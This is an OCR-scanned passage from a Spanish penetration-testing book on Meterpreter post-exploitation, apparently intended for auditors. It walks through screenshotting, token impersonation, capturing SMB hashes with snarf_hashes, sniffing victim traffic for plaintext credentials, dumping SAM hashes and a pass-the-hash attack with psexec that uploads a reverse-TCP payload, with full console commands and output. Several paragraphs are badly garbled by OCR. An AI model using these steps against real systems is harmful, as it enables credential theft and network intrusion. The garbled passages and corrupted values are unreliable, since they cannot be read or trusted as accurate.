Estos  modulos  anaden  comandos  a  la  sesion  los  cuales  proporcionan  mayor  flexibiiidad  y  potencia 
al  auditor  en  esta  fase  de post-explotacion . 

Cuarnlo  se  aiiaden  nuevos  mddulos  a  Meterpreier  se  puede  utilizar  ei  coraando  help  para  conocer 
exactamenie  que  nuevos  comandos  hay  disponibles  en  la  sesion  interactiva  del  payload.  En  este 
apartado  se  estudiaran  los  siguientes  modulos: 

Espia.  Este  modulo  proporciona  funcionalidades  para  reaiizar  capturas  de  pantaila. 

:  lnc°Snito.  Este  modulo  proporciona  funcionalidades  con  las  que  el  auditor  podra  ir 
mipersonalizando  usual ios,  e  incluso  administrar  los  usuarios  reales  que  existen  en  la 
maquina  vulnerada. 
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~  Sniffer.  Este  modulo  proporciona  funcionalidades  con  las  que  el  auditor  podra  comprohar 
y  aprovecltar  el  entorno  de  red  de  la  maquina  vulnerada.  Por  ejemplo,  se  podra  conocer  el 
entorno  de  red  y  el  trafico  que  circula  por  este  de  dicha  maquina. 

Para  la  carga  o  utilizacidn  de  dichos  modulos  se  dispone  del  comando  bad  Yambien  se  pociria 
utiiizar  el  comando  use ,  ya  que  realiza  la  misma  funcion,  pero  se  encuentra  en  desuso. 

Ei  comando  load  dispone  de  dos  parametros,  que  son  -h  y  -1.  El  primero  proporciona  ia  ayuda 
e  infornmeion  de  use  del  comando.  Ei  segundo  en  cambio  devuelve  un  Sistado  tie  los  modulos 
disponibles  para  ser  cargados  en  Meterpreter. 


'aeterpreter  >  load  -l  Pr*v 

espia  priv.x64 

espia, *64  snHt8- 

incognito  sniff ei .xu4 

incognito.  x54 

lanattacks  staopi.xo4 


|lanattacks.x64 _ 

Fig  4.34:  Listado  de  modulos  para  la  carga  en  Meterpreter. 

Modulo:  Espia 

para  cargar  el  modulo  espia  se  utiliza  la  siguiente  instruccion  en  una  sesion  de  Meterpreter  bad 
espia.  A  continuacion,  si  se  ejecuta  help  se  puede  obtener  el  listado  de  comandos  que  proporciona  el 
nuevo  modulo  cargado.  En  este  caso,  el  modulo  espia  proporciona  un  solo  comando. 

El  comando  screengrab  permite  al  auditor  obtener  captures  de  pantaila  de  la  maquina  vulnerada. 
Esta  es  una  funcionalidad  que  ya  se  ha  utilizado  en  este  iibro  a  traves  del  uso  ue  oiros  comandos  o 
scripts.  El  modulo  espia  debe  ser  visto  como  un  modulo  que  debe  implementor  distiutas  solucicmes 
para  reaiizar  captures  de  teclado,  microfono,  webcam,  etcetera.  Actualmentc,  no  presenta  dichas 
funcionalidades. 

meternreter  >  screengrab  -h 

Usage:  screengrab  <path.jpeg>  [view  in  browser:  truejfalse] 

Grab  a  screenshot  of  the  current  interactive  desktop.  \ 

meterpreter  >  | _ _ _ r _ I 

Fig  4.35:  Ejecucion  de.  screengrab  sobre  maquina  vulnerada. 

Modulo:  Incognito 

El  modulo  incognito  es  uno  de  los  mas  interesantes,  ya  que  simplifica  mueho  la  labor  de  gestion 
de  usuarios  y  la  impersonalizacion  de  estos.  Para  cargar  el  modulo  se  debe  ejecular  la  siguiente 
instruccion  load  incognito. 
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incognito  Commands 


Description 


-dss;  »ser «  z;  o°  ■  ?>« 9rap  uith  •»  «- 
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credenciates  y  potter  acceder  asi  ei/cuaiquier  momenta  “  n“q“'”  *'  *  Con02can  i:w 

La  sinlaxis  del  comando  es  eddjaer  <muario>  <com,mcm>. 


(te  pm 1-e.xpblacion.  La  sintaxis  es  la  sio.iientf  *’  qi"e,e  m<’H,enl°  dado  de  la  fase 

compuesto  por  <nombre  mtiquina>  I \<usuarin  o  vp  ,m?^rs°t,‘?e-n*en  Donde  token  esta 

para  quo  Meterpreter  lo  identilique  como  una  sola  l^invertT  inWrti<b 


feergreter  *  getuIcT~ - - - — - - - , 

Server  username:  NT  AUTH0RITY\5YSTEM 
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fJo  tokens  available  _ j 

Fig  4.38:  Lisfando  tokens  dc  ia  maquina  vulneradrt. 


El  comando  snarf Jmshes  permite  capturar  ios  hashes  de  sesiones  SMB,  su  sintaxis  es  snarf  hashes 
<hmt>.  .  ‘  ~ 


FoC;  Recuperando  hashes  SMB  con  snarf  hashes 

kn  ^sta  Prue^  de  concepto  el  auditor  intentara  utilizar  snarf  hashes  para  provocar  el  reenvio  de  Ios 
hasries  a  traves  de  una  eonexion  SMB.  Para  elto  el  auditor  implemenlara  tin  servidor  SMB  mediante 
el  modulo  amiliarv/server/capture/smh.  Este  servidor  recibira  los  hashes  del  usuario  con  sesion  en 
curso  en  la  maquina  remota. 


SSI  exploit  (msflB  Ofiy  netapi)  >  use  nuxiliary/server/caoture/sflib  "  ~ “ — - 

®if  auxiliary  (sirli)  >  show  options 

Module  options  (auxiliary/server/capture/smb); 

Mairio  Current  Setting  Required  Description 

CAINPWFILE  no  The  local  filename  to  store  the  hashes  in  Cain&Abel  fo 


CAINPWFILE  no 

rmat 

CHALLENGE  1122334455667780  yes 

JOHNPWFILE  no 

(i  JOHN  format 

SRVHOST  0.0. 6.0  yes 

ii  the  local  machine  or  0.0. 3.0 
snvpoivr  445  yss 

SSL  false  no 

SSLCert  no 

generated) 

SSLVersion  SSL3  no 

3d:  SSL2,  SSL3.  TLS11 


The  8  byte  challenge 

The  prefix  to  the  local  filename  to  store  the  hashes  i 

The  local  host  to  listen  on.  This  must  be  an  address  0 

The  local  port  to  listen  on. 

Negotiate  SSL  for  incoming  connections 

Path  to  a  custom  SSL  certificate  (default  is  randomly 


j  no  Specify  the  version  of  SSL  that  should  be  used  (accept 


Fig  4.39:  Configuracion  del  modulo  auxiliary/server/capture/smb. 
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Es  importante  configurar  el  modulo  correctamente,  ya  que  en  caso  conlrario  no  se  podnh  obtener  las 
credenciales  de  esta  forma.  El  servidor  dispone  de  unas  opciones  interesantes  como  son  ia  creacion 
de  ficheros  para  herramientas  como  Cain,  y  uno  de  los  mas  iamosos  crackeadores  John  the  ripper 
En  la  prueba  de  eonceplo  se  configure  para  que  se  capturen  los  hashes  y  ademas  se  creen  archives 
compatibles  con  estas  herramientas  para  su  posible  crackeo  mas  adeJante. 

iSl  auxiliary (smb)  >  set  CAINPWFILE  /root/cain. cap 
CA1NPWFILE  =>  /root/cain. cap  P 

igf  auxiliary (smb)  >  set  JOHNPWFILt  /root/iahn  can 
30HNPWFILE  =>  /root/john.cap  P 

isf  auxiliary(srnb)  >  set  SftVHOST  192.168.8.66 
SRVHOST  *>  192.168.6,60 
!£l  auxiliary (smb)  >  run 
{*}  Auxiliary  inod-ile  execution  completed 

1*1  Server  started. 

Is!  auxiliary (smb)  >  sessions  -i  2 
(*]  Starting  interaction  with  2... 

Pig  4.4U:  Ejeeucion  del  modulo  auxitkny/server/capture/smb. 

Una  vez  se  configure  ei  servidor  SMB  se  debe  volver  a  la  sesibn  de  Meterpreter  donde  se  ejecuta  el 
comando  marf Joshes,  siempre  y  cuando  el  modulo  incognito  se  encuentre  cargado.  El  comando 

mcnf  Joshes  se  debe  ejecutar  apuntando  a  la  direccion  IP  ddnde  se  debe  enviar  la  informacion  con 
ios  hashes. 


SStfilOMer  >  snarf  hashes  192.168.0.68  ~~  - — 

1*1  Snarling  token  hashes.., 

1*1  SMB  Captured  -  2812-08-31  12:36:18  +0280 

NTLMVI  Response  Captured  from  192.168.8.59:1107  -  192.168.0.59 

LMHASH: 78366c3e4b835a3al6ece91cd6f248402f85252Cc731bb251Ce  ^  3  ^  LH:Wind°WS  2002  5>1 

NTHASH : 5b4e9c495d0f 39 f 3960c9a24aad7c9b71cb7a09893f 64f 6b 

(*I  Done.  Check  sniffer  logs 
meterpreter  > 


big  4.4 J :  Obleneion  de  hashes  sobre  el  us 


usuario  con  la  sesion  en  curso. 


Modulo:  Sniffer 

Este  modulo  anade  fimcionaiidades  de  red  a  la  maquina  vulnerada.  El  auditor  podia  realizar  capturas 
de  red  a  traves  de  la  maquina  remota.  Ademas,  se  podran  gestionar  las  interfaces  y  conocer  mejor  de 
esta  manera  el  entorno  de  la  red  en  la  que  se  encuentra  la  maquina  vulnerada.  Un  ejemplo  interesanlc 
es  la  posibdidad  de  que  dicha  maquina  vulnerada  disponga  de  varias  interfaces,  e  incluso,  que  este 
conectada  a  un  segmento  de  red,  a  la  que  a  priori,  el  auditor  no  lenga  conectividad.  De  este  rnodo, 
se  puede  iiegar  a  segmentos  de  red  que  antes  no  se  podia.  El  modulo  sniffer  tiene  una  serie  de 
eomandos,  tal  y  como  se  puede  ver  en  la  imagen. 
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Command 

Description 

- 

sniffer_dn9ip 

sniffer~interfaces 

snifferrelease 

in 

sniffer  start 

Retrieve  captured  packet  data  to  PCAP  file 

Enumerate  all  sniffable  network  interfaces 

Free  captured  packets  on  a  specific  interface  instead  o 

f  downloading  the 

Start  packet  capture  on  a  specific  interface 

\ 

snifferslats 

snifferstep 

View  statistics  of  an  active  capture 

Stop  packet  capture  on  a  specific  interface 

Fig  4,42:  L  istado  de  eomandos  que  proporciona  el  mdclulo  sniffer  de  Meterpreter. 


Ei  comando  sniffer _  interfaces  especifica  medianteun  identificador  los  adaptadores  de  red  disponibles 
en  la  maquina  vulnerada.  This  la  ejeeucion  del  comando  se  obtiene  un  listado  con  los  adaptadores. 

El  comando  sniffer  start  arranca  un  sniffer  en  la  maquina  vulnerable  y  permite  obtener  todo  el 
trhfico  de  red  que  pasapor  dicha  interfaz  en  la  maquina  remota.  La  sintaxis  es  seuciila:  sniffer jstarl 
<  interfaz  de  red>  <buffer>,  donde  buffer  puede  ser  un  numero  de  1  a  200.000. 

El  comando  sniffer _stop  permile  detener  el  sniffer  en  la  maquina  remota,  pero  la  informacion  que 
se  encuentra  en  d  buffer  no  se  pierde.  Ahora  el  auditor  deberla  elegir  entre  dcscargar  lo  capturado  o 
liberal-  el  buffer.  La  sintaxis  es  seuciila:  sniffer _s top  <interfaz  de  red>. 

El  comando  sniffer  dump  permile  descargar  el  contenido  del  buffer,  es  deeir  las  capturas  que  se  han 
realizado,  a  un  fichero  PCAP.  Esta  utilidad  es  realmente  interesante  y  se  puede  lograr  informacion 
valiosa  a  traves  de  ella.  La  sintaxis  es  la  siguiente:  sniffer  Jump  <interfaz  de  red>  <nombre  archive 
PCAP> . 


meterpreter  >  sniff  erdump  1  wee.pcap 

[*)  Flushing  packet  capture  buffer  for  interface  1... 

(*1  Flushed  397  packets  (59962  bytes) 

[*]  Downloaded  186%  (59302/59932)... 

[*j  Download  completed,  converting  to  PCAP... 

(*]  PCAP  file  written  to  wee.pcap 


Fig  4.43:  Dcscarga  del  conlenido  de!  buffer  del  sniffer  configurado  en  la  maquina  vulnerada. 


E!  comando  sniffer  release  permite  eliminar  el  contenido  del  buffer  de  la  maquina  vulnerada..  La 
sintaxis  es  la  siguiente:  sniffer  release  <interfaz  de  red>. 


El  comando  sniffer _s tats  proporciona  la  posibilidad  de  visuaiizar  las  estadlsticas  de  la  interfaz 
seleccionada.  Con  este  comando  se  puede  visuaiizar  informacion  como  el  numero  de  paqueles 
capturados,  y  el  tarnano  de  la  captura.  La  sintaxis  de  este  comando  es,  similar  a  las  anteriores: 
sniffer  stats  <inlerfaz  de  red>. 


PoC:  Espiando  la  red  de  la  victima 

En  esta  prueba  de  concepto  se  utilizara  el  modulo  sniffer  para  realizar  capturas  de  trafico  de  la  red 
donde  se  encuentra  la  maquina  vulnerada.  Despues,  se  procedera  a  realizar  un  analisis  de  la  captura 
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cfe  Irtffco  pan.  pooler  visuafiar information  interesaute,  como  por  tiemnio  cookies 

pio  oco.os  no  seguros,  archives  mediants  su  reconstruccifiii,  etcetera.  ' 

rel!b"lo  h  cfv11^  •“  "T  76n  de  Mc,erPreler  I*  cual  el  auditor  ha  obtenklo  una  vez  <;ue  lu. 
escemrio:  '  '  °"  "  prem  A  continU!":i™  »  ^lailau  ia3  miqumas  y  fos  roles  ole 

rA  auditor  dispone  de  una  maquina  con  BackTrack  5. 

La  '^aqui-na  vuinerada  ejecuta  un  sistema  operative  Windows.  XV  SP3. 

loguea^en un  M^ci^,J^^eX,°neS  '  V&&mS  ^  interaet*  Adera4s’ ifllenlar* 

*  tZ'rZ  D^f  £?  hadSnWer’  P!lra  «** “<>  '^dulo  on  la  sesmn 

!r^ 

^:z:::z  sorpresas  y  — - — «*»  «*■  ^ 

“laSiT&CeS  de  red>  Se  debe  W  d  •»  h  maquiua  vuinerada.  Para  e||o  se 
cue  68,05  —  tod°  d 

meterjKrter  >  snifferjstari  1  188000 - - - - . 

Capt“re  started  on  interface  l  (186060  packet  buffer)  i 
BffiScrp  refer  >  snifter  stats  ■  [ 

t']  Osage:  sniffer_stats  finterface-id] 
astSHralBC  >  sniffer  stats  1 
f*J  Capture  statistics  for  interface  1 
packets:  6 
bytes:  0 

meteiargter  >  sniffer  stats  1 
f*3  Capture  statistics  for  interface  l 
packets:  423 
bytes:  269734 
gjeternreter  > 

Fig  4.44:  Ejecucion  del  sniffer  en  remoto. 

sstwsr-sa s— 

^  ™7,e  Se  d7°n?  4:1  arChiv°  PCAP  en  Ia  mMna  *1  auditor  se  orocede  a  su  anaUsis  En  esra 
'  COnCq,t°  “  buSCar4  Wfico  HTTP.  FTP  y  alguna  imager,  que  la  victim,  hay,  vissLdo. 
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Para  elio,  se  utilizara  la  herramienta  Wireshark ,  aunque  existen  otras  herraniientas  que  automatizai 
eJ  proceso  de  busqueda  de  esta  informaeion. 

meterpreter  >  snifferstop  I  r^r  “ 

hi  Capture  stopped  on  interface  1 

1*}  There  are  2458  packets  {1582828  bytes)  remaining 

hi  Download  or  release  them  using  'sniffer  dump'  or  'sniffer_ release’ 

meterpreter  >  sniff er  dump  metesploit.pcap  ~ 

[-]  Usage:  sniff crjiump  [interface-id]  [pcap-file] 

Bflterpreter  >  sniff  erdump  1  metasploit.pcap 
hi  flushing  packet  capture  buffer  for  interface  I... 
f*]  Mushed  2458  packets  {1631988  bytes) 

[*]  Downloaded  832%  (524280/1631988),., 
hi  Downloaded  864%  (1040576/1631988),.. 
hi  Downloaded  095%  (1572864/1631388).,. 

,  !*]  Downloaded  100%  (1631988/1631988)... 

I.*!  Download  completed,  converting  tc  PCAP,.. 

[*)  PCAP  file  written  to  metasploit.pcap 
meterpreter  > 

Fig  4.45:  Parada  del  sniffer  y  desearga  del  archivo  PCAP  resultante. 

Se  precede  a  la  tiperttira  de  la  aplicaciori  Wireshark  y  el  archivo  PCAP.  Se  utilizaran  los  filtros  del 
Wireshark  para  realizar  las  busquedas  de  ia  informaeion  interesante,  en  este  caso  el  trrifico  HTTP.  El 
fillro  aplicado  sera  “ HTTP  contains  “ password ”  ”,  y  se  puede  apreciar  como  se  filtra  todo  a  im  unico1 
paquete.  En  la  imngen  se  puede  vjsualizar  como  aparece  la  contrasefia  y  el  usuario  en  texto  piano. 


Shttp  contains  "password".: 


emailAddress=nietasploit%40flu&password=123abc. 

Fig  4.46:  Busqueda  de  crcdenciales  en  HTTP  a  trav6s  del  archivo  PCAP. 


A  continuacion  se  realizara  la  misma  accion  con  credenciales  de  FTP  y  ia  busqueda  de  imagenes.  En 
primer  liigar  el  filtro  para  el  protocolo  FTP  es  “FTP  contains  PASS ”,  tambien  serra  valido  el  fillro 
“FTP  contains  USER  ”  para  la  busqueda  de  usuarios. 
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5.  Pass  the  hash 

Hoy  en  dia,  las  empress*,  y  grandes  organizaciones  utilizan  la  misma  lecnica  para  recoiilar  las 
credenciaies  y  la  repet, con  de  fates.  Es  realmente  interesante  observar  como  en  un  departamenlo 
con  muchas  maqumas,  la  euenta  de  admimstrador  tiene  anas  credenciaies  Males  en  todas  idlas. 
y  or  que  se  rep, ten?  Es  lAedmente  entendible  que  si  se  disponen  de  1000  n, Aquinas,  proporcionar 
,000  con  rasehas  do  adrainistrador  distintas  y  poder  llevar  un  inventario  no  serf*  terea  sencilla. 
lambien  bay  que  visualizar  ia  otra  parlc  del  asunto  y  es  que  seria  viable  utilizar  distintas  cuentas 
de  administrador  en  runeion  del  departamenlo,  por  ejeraplo.  Otra  action  no  recomendable  seria 
asrgnar  cuentas  de  admmistgslqrpon  conlrasena  ascendente.  En  definitiva  es  un  problem*  complejo, 
y  una  oe  las  soluciones  rnfa  utitizadas  es  la  asignacion  de  credenciaies  administrativas  distintas  por 
clepartamento,  con  un  responsabie  sobre  dicha  credential. 

Pass  the  hash  o  “impersonalizacion  de  usuarios”  proportions  al  auditor  la  posibillilad  de  conociendo 
d  hath  de  la  contrasena  de  un  usuario  acceder  a  los  recursos  de  otras  mSquinas  con  la  identidad  de 
dicho  usuario.  Logicamente,  para  acceder  a  dichos  recursos  el  usuario  debe  tener  permisos  en  diclias 
maqumas,  pero  como  se  ha  comentado  anterionnenle,  si  se  vulnera  una  inAquina  y  se  obtiene  el 
hash  del  usuario  administriidor  es  muy  probable  que  se  pueda  acceder  a  otras  maquinas,  ya  que  los 
admimstradores  de  diclias  maquinas  sueien  tener  la  misrna  credential. 

Muchos  adminisfradores  piensan  que  fortificando  su  credencial  con  alfanumeriuos  y  gran  iongitud  de 
caracleres  se  evita  un  crackeo  del  hash.  Este  heclio  es  practicamente  cierto,  ya  que  realizar  cracking 
de  una  conlrasena  con  aifanumericos  y  gran  Iongitud  podria  llevar  bastanle  tiempo.  Aunqtie  mds 
adelante  se  estudiara  que  en  realidad  depende  del  formato  del  hash. 

En  definitiva,  la  impersonalizacion  persigue  la  manipulation  de  los  datos  de  autenticaeion  en  un 
sistema  operativo  Windows,  con  el  fin  de  acceder  a  otras  maquinas  que  dispongan  de  un  mismo 
usuario  con  un  mismo  hash,  es  decir  la  misrna  contrasena,  que  en  la  maquina  de  la  que  se  parte. 
Un  ejemplo  en  una  auditona  seria,  tras  la  vulneracion  de  una  maquina  en  la  fase  de  explotacidn, 
conseguir  los  hashes  y  usuarios  de  dicha  maquina,  por  ejemplo  el  de  administrador.  En  este  punto  se 
puede  intentar  impersonalizar  los  usuarios  o  el  usuario  contra  otras  maquinas  que  se  encuentren  en 
la  red  de  la  empresa.  Mediante  esla  tecnica  tambien  se  puede  impersonalizar  usuarios  de.un  dominio, 
e  intentar  ilegar  ai  administrador  del  dominio. 

Es  interesante  obtener  el  hash  de  un  administrador  porque  se  podran  utilizar  recursos  como 
C$,  adminS,  etcetera.  Por  otro  lado,  tambien  se  pueden  utilizar  herramientas  como  PSTools  de 
Sysinternals  para  ejecutar  procesos  en  remoto  con  dichas  credenciaies,  por  ejemplo,  una  shell. 


Teoria  de  credenciaies  Windows 

Las  contrasenas  en  Windows  se  encuentran  almacenadas  en  un  fichero  denominado  SAM  en  la  ruta 
%windir%\system32\config.  En  este  fichero  se  almacenan  las  contrasenas  cifradas  con  una  funcion 
hash  unidireccional.  Este  hecho  implica  que  una  contrasena  en  texto  piano  se  convierta  en  un  cifrado 
o  hash,  pero  el  proceso  inverso  no  existe  por  lo  que  no  es  posible  descifrar  la  contrasena.  ^Realmente 
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mmm L _ _ _ 

Zir1e  deSCifraI?  U  '“P,Msto  “  no'  P“°  sf  £lue  «*  f^tible  realizar  comprobacioncs  hasla 
"  .C0"‘raseua’  *»  dec,r  ,ln  Proceso  de  brah.  Se  pueden  if  creando  palabras  en  texlo 
p  ano  pasaHas  medmnte  la  luncion  hash  a  su  equivalent  cifrado  y  comprobar  si  e!  resultado  « 

8  ' !  :,i.‘l"e  f8  o'™**™*10  en  el  SAM-  Si  ei  resultado  de  (a  oomparacidn  few  idenlico  se 
■1cU,1Ia  ^escub'erto  e!  valor  en  texto  piano  de  Ja  contrasena  cifrada. 

La  cstructura  del  fichero  SAM  se  compone  de  ia  cuenta  de  usuario,  el  idenlificador  de  este  y  de  las 
uos  vej siones  de  hash  de  los  sistemas  Windows ,  LM  y  NTLM. 

Lan  Manager  (LM) 

Ls  el  primer  hash  de  los  sistemas  Windows  para  almacenar  las  credenciales  en  tin  fichero  V  fne 
inhoducido  en  vers, ones  previas  a  Windows  NT.  Este  algorilmo  de  cifrado  esta  considerado  obsolete 

y  no  seguro,  y  solo  se  implements  en  los  sistemas  modernos  por  ternas  de  compatibiiidad  con  los 
sislemas  operatives  antiguos. 

Ill  funeionamienlo  de  LM,  e  implicitamente  su  debilidad,  se  detailan  a  contimracion: 

La  contrasena  ASCII  del  usuario  se  convierte  a  inayiisculas. 

-  Esta  contrasena  utiliza  J  4  bytes. 

La  longitud  fija  de  esta  contrasefia  se  divide  en  dos  bloques  de  7  bytes. 

Se  cilia  con  DES  los  dos  bloques,  creando  dos  bloques  de  7  bytes  cifrados. 

Se  convierten  los  bytes  en  un  flujo  de  bits  y  se  inserta  un  bit  nulo  despucs  de  cada  7  bits 
generando  los  64  bits  necesarios  para  una  clave  DES,  Pero  solo  56  bits  de  estos  son  necesarios 
El  rnodo  de  ctfrado  de  DES  es  configurado  en  ECB  y  d padding  cs  nulo, 

Los  dos  bloques  cifrados  son  concatenados  dando  lugar  a  16  bytes  del  hash  LM. 

Hay  que  recalcar  las  debilidades  en  este  proceso,  El  maximo  valor  de  caracteres  que  puede  tetter  una 

Cf ild0  \M  »"  *  ><  caracteres,  pero  com.  se  ha  mencionado  antenoZte 
n  contrasen..  sc  divide  en  dos  bloques  cifrados  independientes.  Este  hecho  I, ace  oensar  que  se 
puure  realizar  un  proceso  de  fuerza  brata  sobre  una  contrasena  de  7  caracteres  lo  c'uai  simplifies 

S°b  I"  t0d°  refTnte  *'  tiemP°"  "1ClUS°  hay  m4s  detailes  Olivos  acerca  del 
.  r  q  ’  pr‘nclp10  la  “"taefta  del  usuario  es  convertida  a  mayusculas  lo  cual 

p,lva  q"e  el  cW 0  esPacio  de  caracteres  posible  dismimtye  considerablemente. 

NTLM 

NTi'm  Zln!  LM’  prop0liCiona  mayor  rabustez  v  K*  el  protocolo  de  autenticacion  LM. 

em,  na  ible  ,1  f  *Votacro"“m»  «  N™v2  el  cual  se  introdujo  en  Windows  NT  4.0  SP4, 
Z^  Vr,  C<’"  0m  2m  mej0rand0  la  se8«idad  de  NTLM.  Se  consign* 

—I:  :rres  dc  sup“  y  se  aMi6  ,a  p°“ *  -*•-  - 
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p  occso  de  c.aciung  dv  ^ste  tipo  de  piotocolo  de  autenticacion  provoca  tin  aumento  exponeneiq| 

i.  i  nipo.  so  leoco  si  se  uti  izan  mas  de  8  caracteres,  niezcJando  mayiisculas,  minuscuias 
numeios  y  caracteres  especiales.  j 


Fundonamiento  de  la  validacion  de  credenciales  ] 

CfTCialClSe  eipClie,ltla«n  651  ,ne!110r'a>  hay  que  recordar  que  )a  contrasena  nunca  se  encuentra 
\  \  ^  0  ^  3110 7 81  Ln  ias^» 0  en  aigiinos  casos  en  unacodificacion  sericilla.  Las  credencialel 

oon.macenacins  en  e  pr  oceso  LSASS.EXE,  este  proceso  se  encarga  de  adminislrar  !a  autenticacioi| 
t  r  ^niOo  <  e  autor it.«(  e  segur idad  local  y  ei  directorio  activo.  Para  un  proceso  de  suplantacion 
dc  .dent, dad  se  qniere  sustituir  ias  credenciales  en  memoria  por  to  que  interesa  suplantar.  i 

En  ia  iase  de  inicio  tie  sesion  interactivo,  el  proceso  WfNLOOOM.EXi  es  el  ericargado  de  interceptal 
ti  proceso  de  validacion  dei  teclado.  El  anterior  proceso  te  devuelve  a  LS A  el  procedimiento  de( 
c.  ic  acion.^  aianc  o va  ic  a  al  usuario  se  produce  la  invocacion  de  LSALogonUser  para  autenticaij 
en  .a  ase  oe  a  os  ^Aj  .  ;  ocal  o  remota),  permit! endo  crear .ia  sesion  si  se  autenlied  correctamente. 

oimacion  seia  uti.iza  a  poi  LAN  Manager  y  otros  sei-vicios  cuando  el  usuario  intente  acceded! 
a  lecursos  remotos,  objetos  locales  y  al  utiJizar  sus  privilegios. 


I  °C.  Llegamio  mas  lejos  gracias  a  la  suplantacion  de  identidades 

f  nan°  que;  Se  Propone  651  esta  prueba  de  eoncePto  es  el  de  un  auditor  que  se  encuentra  en  la 
ceP°st  exP ' ota( i<m>  ya  Que  ha  consegtiido  acceso  a  una  maquina  de  la  red  de  una  empresa  que 
esta  auditando.  La  maquina  vulnerada  no  es  una  maquina,  aparentemente,  relevante,  pero  al  parecer 
vai  ios  e  os  usuarios  que  se  encuentran  en  dicha  maquina  tambien  existien  en  otras  maquinas  de  la 
red.  A  contmuacion  se  dan  mas  detailes  del  escenario:  ' 

-  El  auditor  dispone  de  una  maquina  con  BackTrack  5. 

La  maquina  vulnerada  por  el  auditor  tiene  como  sistema  operativo  Windows  XP  SP3. 

-  La  maquina  a  !a  que  se  quiere  acceder  es  un  Windows  7. 

f '  P™‘0  d®  part'da  “ ,a  ses,'™  de  Meterpreter  que  time  el  auditor  en  la  rndquina  vulnerada  Windows 

7  ,  , ,  "  US°  de  comando  bashdump  se  puede  obtener  el  lislado  de  usuarios  con  los 

hashes  LM  y  NTLM. 


'MterjH£ter  >  hashdump  ~~  - - — - - - - - - 

Administ  rador: 500 : 8735l72c3a77d2c6aad3b435b5140,lee : 512b99009997c3b5588caf ac9eQae969 • * • 
Asistente  de  ayuda : 1000: 3I7dd0337ea2d549dc6743cd7ee77792 : eleclbc581f420f 3aG9570442B79965d 

hacked: 1005 :8735172G3a77d2c6aad3b435b51404ee:512b99009997c3b5588cafae9c0ae969' • • 
Invitado:50l:Bad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93lb73c59d7e0c089c0; : • 

J  J!f^o^ci72C3377d2c6aad3b435b51404ee:512b99009997c3b5588c3fac9cOae9B9- . .  ‘  ‘ 

Snfl?0^nQ^1n21CnS7d2ffad3b435b51404ee:512b99009997c3b5588cafac9c03e969::: 

BS  2  :1002:aad3b435b514e4eeaad3b435b5140^ei3cb0da961c4388978ebcc9440e725954-' 


l  ig  4.49:  ()btenci6n  de  los  usuarios  y  hashes  mediante  una  sesion  dc  Meterpreter 
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En  la  imagen  se  puede  visualizar  como  los  hashes  de  los  usuarios  administrador,  hacked  o  pepe  son 
idenlicos.  //or  que  ocurre  esto?  Es  senciilo,  las  contrasenas  de  esos  usuarios  en  texto  piano  son  las 
mismas.  Otra  de  las  debilidades  de  estos  algoritmos  es  que  no  utilizan  semi  Ha  o  challenge  que  hagan 
que  la  misraa  contrasena  tenga  distinto  hash. 


ILa  rula  del  exploit  para  impersonal  izar  se  encuentra  en  exploit/windows/smb/psexec .  Este  modulo 
^dispone  de  las  variables  que  se  especifican  a  eontinuacion: 


t  Variable 

Description 

•  RHOST 

Direction  IP  de  la  maquina  a  la  que  se  quiere  conectar  para  impersonal  izar  un 
usuario. 

SHARE 

Recurso  al  que  se  quiere  conectar. 

SMBDomain 

Dominio  para  la  autenticacion. 

SMBPass 

Password  en  formate  hash  <LMHASH>:<MTLMHASH> 

SMBUser 

Usuario  al  que  se  quiere  irapersonalizar. 

Titbla  4.04:  Variables  del  modulo  exploit/windom/smb/psexec. 


Module  options  (exploit/windows/smb/psexec): 


Name  Current  Setting  Required  Description 


RHQST  yes  The  target  address 

RPORT  445  yes  Set  the  SMB  service  port 

SHARE  ADMIN$  yes  The  share  to  connect  to,  can  be  an  admin  share  (ADMIN$, 

C$. .. .)  or  a  normal  read/write  folder  share 

SMBDomain  WORKGROUP  no  The  Windows  domain  to  use  for  authentication 

SMBPass  no  The  password  for  the  specified  username 

SMBUser  no  The  username  to  authenticate  as 


Exploit  target: 
Id  Name 
9  Automatic 


msf  exploit (psexec)  >  set  RHOST  192,168.1.37 
RHOST  =>  192.168.1.37 

msf  exploit (psexec)  >  set  SMBPass  8735172c3a7?d2c6aad3b435b51404ee:512b99009997c3b5588cafac9c0a 
e969 

SMBPass  =>  8735172c3a77d2c6aad3b435b51404ee:512b99009997c3b5588cafac9c0ae969 
msf  exploit (psexec)  >  set  SMBUser  administrador 
SMBUser  =>  administrador 
msf  exploit  fpsexec)  > 


Fig  4.50:  Configuration  del  modulo  exploit/windows/smb/psexec. 


JSe  puede  conftgurar,  mediante  la  variable  PAYLOAD,  un  payload  distinto  que  Meterpreter ,  pero 
para  esta  prueba  de  concepto  se  utilizara  windows/meterpreter/reversejcp.  Si  no  se  especiilca 


payload,  automaticaniente  se  inyectara  Meterpreter.  Tras  obtener  una  suplaniacioq  de  usu-trio 
autoraaticamente  se  ejecuta  el  payload  en  la  maquina  reniota. 


msf  exploit  (psexec)  >  exploit  — — - 

[*]  Started  reverse  handler  on  192.163.1.40:4444 
[*1  Connecting  to  the  server. < . 

(*]  Authenticating  to  192. 168. 1.41; 445) WORKGROUP  as  user  ‘Administrador'... 
t*J  Uploading  payload... 

[*]  Created  \wMjl3qPnM.exe... 

t  * ]  Binding  to  3G7abb81- 9844- 35f 1 - ad32  * 98f 938601003 : 2 . e@ncacn_np : 192 .168.1.41 1 \svcct l J 
(*]  Bound  to  367abb81 -9844 -35f l-adB2 -98f S38001663 : 2 , 0@ncacn_np : 192 . 160 . 1 . 41 [ \svcc tl ] 

[*J  Obtaining  a  service  manager  handle... 

i*J  Creating  a  new  service  (GnfCKeHF  -  “HekeYdzMRSIolLph") . . . 

1*]  Closing  service  handle... 

[*)  Opening  service... 
j»]  starting  the  service... 

!*j  Removing  the  service... 
f*]  Closing  service  handle. . . 

I*}  Deleting  \wMjBqPnM.exe... 

M  Sending  stage  (752128  bytes)  to  132.168.1.41 

1*3  Meterpreter  session  7  opened  {192.168.1.49:4444  ->  192.168.1.41:49159)  at  2012-08^31 
3  +0206 

meterpreter  > 


Fig  4.5 1 :  Stiplaulacion  de  usuario  e  inyeccion  de  payload  en  la  maquina  rcmota. 


VVCE:  Windows  Credential  Editor 

La  aplicacion  Windows  Credential  Editor  permite,  entre  otras  opciones,  su plantar  eu  meniom 
la  identidad  del  usuario.  La  aplicacion  se  puede  descargar  desde  la  siguiente  URL  http://Wmv 
ampliaseciirity.com/research.html.  Una  vez  que  se  dispone  del  listado  de  usuarios  y  hashes  se  pueden 
